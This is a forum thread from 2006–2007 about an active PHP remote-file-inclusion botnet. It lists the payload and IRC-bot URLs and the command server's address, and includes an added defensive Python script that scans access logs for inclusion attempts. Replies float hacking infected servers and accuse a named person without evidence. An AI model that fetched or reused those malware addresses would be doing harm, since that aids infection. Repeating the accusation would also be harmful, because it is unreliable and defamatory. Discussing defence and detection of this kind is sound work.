Sla.ckers.org
How robots and spiders are causing issues, how to stop them. We can also talk about Completely Automated Public Turing Test To Tell Computers And Humans Apart - their use, their compliance issues, porn proxies, PWNtcha and other ways to defeat them. 
Active Botnet
Posted by: Evaders99
Date: October 25, 2006 11:15PM

(I guess this topic goes under Robots, if not, feel free to move it)

Wonder if I can get some help on an active botnet. While my server and many others are already blocking libwww-perl, it is still a concern for the hundreds, perhaps thousands of servers under control of these guys.

http://crewbox.by.ru/crew/list.txt
is the main file being injected through many known PHP script vulnerabilities

that loads an IRC bot
http://crewbox.by.ru/crew/x2.txt

which goes to
208.53.153.25:13131
room #box

I just idled for an hour logging everything, until they finally kicked me off.
Already emailed the webhost as well as the IRC host, but I don't know if they will do anything. Any way you can think of to either bring them down / stall them / or disclose to the many servers that have been hacked this way?

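Added example, not part of the original thread or any poster's code: a log check a server admin could run to see whether their own PHP scripts were probed with the kind of remote-file injection the post above describes, and whether the client identified itself as libwww-perl. The log lines, hostnames and parameter names are constructed placeholders, and the Apache "combined" log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/Nginx "combined" access log format (assumed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A query value that is itself an absolute URL is the inclusion indicator.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)

def find_rfi_attempts(lines):
    """Return one finding per query parameter that carries a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        query = urlsplit(m['target']).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; unquote again to catch double encoding.
            value = unquote(value).strip()
            if REMOTE_URL.match(value):
                findings.append({
                    'ip': m['ip'], 'time': m['ts'], 'param': name,
                    'remote': value.rstrip('?'),  # drop the trailing "?" padding
                    'status': int(m['status']),
                    'scripted_ua': 'libwww-perl' in m['ua'].lower(),
                })
    return findings

# Constructed sample lines (documentation IP ranges, placeholder hosts).
SAMPLE = [
    '198.51.100.7 - - [25/Oct/2006:22:01:13 +0000] "GET /index.php?page='
    'http://remote.example/list.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [25/Oct/2006:22:03:40 +0000] "GET /gallery.php?dir='
    'http%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.0" 404 209 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [25/Oct/2006:22:05:02 +0000] "GET /index.php?page=about'
    ' HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in find_rfi_attempts(SAMPLE):
        print(f)
```

A flagged request that returned status 200 is a reason to inspect that script and host, not proof that the inclusion succeeded; matching on the parameter value also catches clients that do not send a libwww-perl User-Agent.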
Re: Active Botnet
Posted by: maluc
Date: October 25, 2006 11:41PM

Honestly, not to be pessimistic.. but botnet herders are wayyy ahead of the anti-botnet crowd. Shutting down their IRC server really isn't going to solve anything - just annoy them. Assuming they're smart enough to keep connection logs .. they already know every IP of infected clients. All they have to do is reinfect one with a high upload speed to serve as a new server, then reinfect the rest to point to the new server. This too can be automated.. so I'm not really sure what you're hoping the outcome to be. But it's probably overly optimistic :/

The best you can really hope for to shut them down is two-fold. Either A.) contact every infected bot and get them to fix their vulnerabilities, or B.) if they're using it for monetary gain like AdSense or adware installs, locate their affiliate ID then notify Google/adware distributor that that affiliate is using illegal means. Additionally, Google/company may have personal information of the cracker like name and bank account with which to give to authorities in their country. Looking at the URL though, if the cracker is in Russia as well, you might as well save yourself the effort.

Back to point (A) you 'could' also hack all those IPs yourself, if you can get a list, and patch their holes so that they're no longer exploitable. Unfortunately for Good Samaritans, that's illegal despite the good intentions. In conclusion, the anti-botnet groups are hardly putting a dent into the botnet community and mostly just a pesky fly on their wall. Keep your own servers protected and that's probably the best you can hope for. :/

Pessimistic I know, but true
-maluc

Re: Active Botnet
Posted by: kimberly411
Date: July 27, 2007 11:45AM

I don't know if this will help, but have you tried anticrawl? It's a small program that works with your SQL and scans for bad bots. It's supposed to work pretty well. The link is anticrawl.com.

It seems a shame that you have to labor so hard to weed out scrapers and such if in fact that is what's going on. Apparently this guy Robert Plank is a botnet kind of guy. Good luck with everything.

Re: Active Botnet
Posted by: rsnake
Date: August 26, 2007 05:40PM

Interesting - I hadn't seen that before. I've built a lot of the same tech before, but never seen anything pre-canned before.

- RSnake
Gotta love it. http://ha.ckers.org
